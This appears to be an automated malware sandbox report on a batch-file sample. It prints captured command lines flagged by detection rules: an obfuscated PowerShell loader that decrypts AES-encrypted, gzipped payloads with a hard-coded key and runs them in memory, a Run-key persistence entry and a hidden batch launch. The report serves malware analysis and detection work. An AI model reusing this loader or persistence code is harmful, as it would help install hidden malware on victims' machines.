[blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); , CommandLine: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+'eTy'+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+'n'+'s'+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$WLjbMWfHUpI.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+',Pu'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uwMlljVVwbVUVD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');$WLjbMWfHUpI.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'ubl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'N'+'ew'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+'i'+'rt'+'u'+''+[Char](97)+''+[Char](108)+'',$qJfzFIqcrY,$uwMlljVVwbVUVD).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $WLjbMWfHUpI.CreateType();}$ulnmlpDbsuVQN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+'o'+'s'+[Char](111)+'f'+[Char](116)+''+[Char](46)+'Wi'+'n'+'3'+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+'a'+'t'+'i'+''+[Char](118)+'eM'+[Char](101)+''+[Char](116)+''+'h'+''+'o'+'ds');$skqIwP
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+'eTy'+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+'n'+'s'+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$WLjbMWfHUpI.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+',Pu'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uwMlljVVwbVUVD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');$WLjbMWfHUpI.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'ubl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'N'+'ew'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+'i'+'rt'+'u'+''+[Char](97)+''+[Char](108)+'',$qJfzFIqcrY,$uwMlljVVwbVUVD).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $WLjbMWfHUpI.CreateType();}$ulnmlpDbsuVQN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+'o'+'s'+[Char](111)+'f'+[Char](116)+''+[Char](46)+'Wi'+'n'+'3'+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+'a'+'t'+'i'+''+[Char](118)+'eM'+[Char](101)+''+[Char](116)+''+'h'+''+'o'+'ds');$skqIwP
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine|base64offset|contains: 7z, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8184, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, ProcessId: 3620, ProcessName: schtasks.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); , CommandLine: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/
Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3852, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8184, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3852, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: Script Block LoggingAuthor: frack113: Data: EventID: 4104, MessageNumber: 1, MessageTotal: 1, Path: , ScriptBlockId: ee13e47e-a9d9-4f3a-8ad0-aaf9101b1df9, ScriptBlockText: Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden , Source: Microsoft-Windows-PowerShell, data0: 1, data1: 1, data2: Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden , data3: ee13e47e-a9d9-4f3a-8ad0-aaf9101b1df9, data4:
Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8184, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{33f9b6db-472d-4fae-86c7-d938bf69b9c0}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 1244, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6112, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 3852, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: azure-winsecure.comVirustotal: Detection: 8%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.0% probability
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,34_2_00401000
Source: Binary string: System.Configuration.Install.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Data.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Core.pdbSystem.Transactions.ni.dlliy source: WER643A.tmp.dmp.27.dr
Source: Binary string: System.pdbMZ@ source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Numerics.pdbp source: WER8767.tmp.dmp.10.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Xml.pdbp source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Drawing.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531084771.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.Security.pdbP source: WER643A.tmp.dmp.27.dr
Source: Binary string: System.Core.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531084771.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Drawing.pdb0 source: WER8767.tmp.dmp.10.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Configuration.Install.pdb }b source: WER8767.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: mscorlib.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: mscorlib.pdb:\W source: WER8767.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000030.00000002.2995887464.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Xml.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.DirectoryServices.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.pdbP4 source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Configuration.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Configuration.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Data.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Windows.Forms.pdb` source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Xml.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531084771.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000030.00000002.2995887464.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Data.pdbH source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Windows.Forms.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.Automation.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
